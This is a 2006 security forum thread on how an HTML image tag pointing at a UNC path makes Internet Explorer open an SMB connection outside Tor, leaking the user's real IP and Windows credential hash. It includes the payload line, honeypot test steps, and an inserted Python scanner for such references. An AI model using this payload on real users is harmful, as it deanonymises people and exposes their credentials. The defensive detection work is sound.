Sla.ckers.org
Bypassing Tor
Posted by: blad3
Date: December 14, 2006 12:47PM

Tor is great and all, but if you put on some website:

<img src="\\my.ip.address\folder\img.jpg">

and navigate to that website using Internet Explorer, Windows will connect to my IP address to retrieve that image. Put a sniffer there and you managed to bypass Tor.

As a bonus, besides revealing one's identity, Windows will also send your current username and password hash. Windows has this nice "feature" that it will try to use your current username and password when accessing a network share. Only if that fails will it ask you for credentials.

Re: Bypassing Tor
Posted by: rsnake
Date: December 14, 2006 05:50PM

Whoah... does that really work? That seems like a pretty nasty issue.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Bypassing Tor
Posted by: jungsonn
Date: December 14, 2006 11:24PM

Did you test this, blad3?

If I understand correctly, the image is hosted on your local PC, so it tries to get the image on that website, through your router/firewall.

Then it sends the IP (and you can sniff it, or just use netstat?), but that must be the IP from the Tor exit node, I guess?

I wonder/doubt it will send the user's real IP through Tor,
but if you can show an example I would be very, very, let's say immensely happy! :))

Re: Bypassing Tor
Posted by: blad3
Date: December 15, 2006 03:28AM

Yes, I have tested this. Based on my tests, it's working just fine.
Somebody else should try to reproduce these tests for confirmation.

jungsonn, yes. The image is hosted on my local PC.
When Internet Explorer visits my webpage, it will try to request that image.
Because it cannot proxy this protocol, it will not send this request through the proxy/Tor.

It sends the IP by connecting to my computer to retrieve that image file so it can display it. It's not the IP from the Tor exit node; the request will not pass through Tor (it's CIFS/NetBIOS/SMB protocol, not HTTP).

In order to show an example, I would need to build a sniffer and run it on my webserver and my hosting does not allow this.

If you want to test this out yourself, do the following:
Let's say you have 2 computers: honeypot and victim.

Create a webpage on honeypot (honeypot should be accessible from the internet) containing <img src="\\honeypot_ip\folder\image.jpg">
On honeypot start a sniffer.

On victim, start Tor and visit the webpage from honeypot through Tor.
In the sniffer, besides the usual HTTP traffic (from a Tor exit node) you should see some NetBIOS traffic (port 445) coming from the real IP address of victim.

Here is a screenshot of the traffic I'm receiving from Internet Explorer.
In my case 192.168.0.25 = honeypot and 192.168.0.26 = victim

http://www.blad3.ro/smb.png

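A defender-side check for the trick blad3 describes, written for this thread as an added example (not code from the thread): it parses HTML and flags any src/href/style url() reference that would make a Windows client open an SMB connection to a named host, while leaving http(s), protocol-relative and local file:/// references alone. The sample page and the host names in it are constructed.

```python
# Added example: scan HTML for resource references that would make a Windows/IE
# client open an SMB (UNC) connection directly, outside the configured proxy.
import re
from html.parser import HTMLParser

RESOURCE_ATTRS = {"src", "href", "data", "poster", "background"}  # fetched automatically
# \\host\share\..., file:\\host\..., file://host/... (non-empty host = remote share);
# file:///C:/... has an empty host, i.e. a local file, and is not matched.
UNC_RE = re.compile(r"^\s*(?:\\\\|file:(?:\\\\|//))([^\\/\s]+)", re.IGNORECASE)
CSS_URL_RE = re.compile(r"url\(\s*['\"]?([^'\")]+)", re.IGNORECASE)  # url() in style=

def unc_host(value):
    """Return the SMB server name the value would be fetched from, or None."""
    m = UNC_RE.match(value)
    return m.group(1) if m else None

class UncRefFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, attribute, host) per UNC reference

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not value:
                continue
            if name in RESOURCE_ATTRS:
                candidates = [value]
            elif name == "style":
                candidates = CSS_URL_RE.findall(value)
            else:
                continue
            for cand in candidates:
                host = unc_host(cand)
                if host:
                    self.findings.append((tag, name, host))

def find_unc_references(html):
    parser = UncRefFinder()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample page: the thread's img trick, a CSS variant, and benign references.
SAMPLE_HTML = """<img src="\\\\honeypot_ip\\folder\\image.jpg">
<div style="background: url(file://honeypot_ip/folder/bg.png)"></div>
<img src="https://example.test/logo.png"> <a href="file:///C:/local.txt">local</a>"""

if __name__ == "__main__":
    for tag, attr, host in find_unc_references(SAMPLE_HTML):
        print(f"<{tag} {attr}> would open SMB to {host}")
```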
Re: Bypassing Tor
Posted by: jungsonn
Date: December 15, 2006 04:45AM

Wow that's nice!

But when I start to think about it, wouldn't it be possible to just turn these protocol services off on Windows? Still, that's why I rarely use MSIE & Windows. I do have it though; it sits on a box, yeah, only as a flytrap :)

Did you try it through FF? Or is this a NO-NO?

Re: Bypassing Tor
Posted by: blad3
Date: December 15, 2006 05:12AM

I think you could turn these protocol services off.
Probably you need to disable Client for Microsoft Networks. Didn't test it.

It will not work on Firefox.
Only Internet Explorer supports this \\ip\folder format.

Re: Bypassing Tor
Posted by: blad3
Date: December 15, 2006 10:45AM

BTW, there are a lot of ways to bypass Tor.

Andrew Christensen released two interesting papers on this subject.
http://www.fortconsult.net/images/pdf/tpr_100506.pdf
http://www.packetstormsecurity.org/0610-advisories/Practical_Onion_Hacking.pdf

I have tested the Flash and the Java methods (both of them work on Firefox).

Re: Bypassing Tor
Posted by: jungsonn
Date: December 15, 2006 03:32PM

Blad3, I read the paper from FortConsult also a month ago after searching for ways. But they state in their second paper (after it) that the Java method no longer works; it returns only "localhost", which is sad, and good. I read further and it seems that it was a flaw in Java itself. It should be fixed by now and no longer working.

Re: Bypassing Tor
Posted by: blad3
Date: December 15, 2006 10:22PM

Well, I can tell you for sure it still works.
I tried yesterday on Firefox 2.0 and Tor.

JavaScript tricks are not working.

Re: Bypassing Tor
Posted by: jungsonn
Date: December 16, 2006 02:03AM

I guess you are right:
http://www.inet-police.com/cgi-bin/env.cgi

Strange, I read somewhere that it did not function anymore, so you see, don't believe what you hear until you see it yourself :)
